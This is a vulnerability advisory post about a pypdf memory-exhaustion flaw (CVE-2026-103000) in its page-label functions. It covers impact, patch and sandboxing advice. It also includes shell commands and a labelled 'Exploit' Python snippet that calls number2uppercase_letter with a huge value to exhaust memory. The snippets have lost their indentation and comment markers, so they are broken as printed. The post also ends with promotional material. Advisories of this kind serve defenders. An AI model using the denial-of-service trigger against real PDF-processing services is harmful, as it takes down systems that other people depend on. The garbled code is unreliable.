pypdf, Uncontrolled Resource Consumption, CVE-2026-103000 (High) -DC-Oct2026-2695

Listen to this Post

CVE-2026-103000 is a high-severity uncontrolled resource consumption vulnerability (CWE-400 / CWE-770) affecting pypdf, a free and open-source pure-Python PDF library. The flaw resides in pypdf/_page_labels.py, specifically in the `number2uppercase_letter` and `number2lowercase_letter` functions, which convert numeric values into alphabetical page labels (e.g., “A”, “B”, …, “Z”, “AA”, “AB”, …). When an application retrieves page labels from a crafted PDF, the library generates a string whose length is determined directly by the numeric value supplied in the PDF’s `/PageLabels` number tree. There is no upper bound on the generated string length prior to version 6.19.0. An attacker can embed an unusually large page-label value (for example, a number equivalent to thousands or millions of repeated letters) in a PDF file. When a victim application—such as a document viewer, indexing service, or automated PDF processing pipeline—accesses the document’s page labels, pypdf attempts to construct an enormous string in memory. This leads to excessive memory allocation, which can cause the application to crash, become unresponsive, or exhaust system resources, resulting in a denial of service (DoS). The vulnerability is remotely exploitable without authentication (CVSS 4.0: 8.7, AV:N/AC:L/AT:N/PR:N/UI:N/VA:H). The issue was discovered and reported through the GitHub Security Advisory process, with a fix merged via Pull Request 4096 and released in pypdf version 6.19.0.

DailyCVE Form:

Platform: pypdf
Version: < 6.19.0
Vulnerability : Memory DoS
Severity: High
date: Sep 16, 2026

Prediction: Patched Oct 2026

What Undercode Say:

Analytics

Install the vulnerable version for analysis:

pip install pypdf==6.18.0

Inspect the vulnerable function that lacks length limits:

python3 -c "import inspect; from pypdf._page_labels import number2uppercase_letter; print(inspect.getsource(number2uppercase_letter))"

Simulate the memory amplification by calling the function with a large integer:

python3 -c "
from pypdf._page_labels import number2uppercase_letter
Attempt to generate a label for page index 500,000
try:
label = number2uppercase_letter(500000)
print(f'Generated label length: {len(label)}')
except MemoryError:
print('MemoryError triggered - application would crash')
"

Monitor the process memory consumption while the function runs:

python3 -c "
import resource
from pypdf._page_labels import number2uppercase_letter
result = number2uppercase_letter(1000000)
print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
"

Compare against the patched version to observe the enforced limit:

pip install pypdf==6.19.0
python3 -c "
from pypdf._page_labels import number2uppercase_letter
try:
number2uppercase_letter(1000000)
except ValueError as e:
print(f'Limit enforced: {e}')
"

Exploit: (Educational Purposes!)

A crafted PDF can contain a `/PageLabels` dictionary with a number tree that assigns an extremely large numeric value to a page index. When a victim application calls the `page_labels` property or any function that invokes `number2uppercase_letter` or number2lowercase_letter, pypdf will attempt to build a string whose length is proportional to that value. For example, a value of `10,000,000` would cause the library to construct a string of millions of characters, rapidly consuming available memory. This can be delivered through any channel that accepts PDF files: email attachments, web uploads, or automated document ingestion systems. No user interaction beyond opening or processing the document is required.

from pypdf import PdfReader
from pypdf._page_labels import number2uppercase_letter
Educational demonstration only
malicious_index = 10000000
try:
label = number2uppercase_letter(malicious_index)
print(f"Length: {len(label)}")
except MemoryError:
print("Memory exhausted - DoS achieved")

Protection:

Upgrade to pypdf version 6.19.0 or later. If immediate upgrade is not possible, apply the changes from Pull Request 4096, which introduces a length limit of 512 characters for alphabetical page labels and raises a `ValueError` when the generated string would exceed that bound. For applications that process untrusted PDFs, consider sandboxing the PDF parsing process with strict memory limits (e.g., using cgroups, ulimit, or container resource constraints) to contain the impact of memory exhaustion. Avoid calling `page_labels` on documents from untrusted sources until the patch is applied.

Impact:

Successful exploitation leads to a denial of service condition. The target application may crash due to MemoryError, become unresponsive due to swapping, or be terminated by the operating system’s OOM killer. In multi-tenant environments, this could affect other users or services sharing the same host. The vulnerability does not allow code execution, data exfiltration, or privilege escalation—its impact is limited to availability. However, in critical document processing pipelines, even a temporary denial of service can cause significant disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top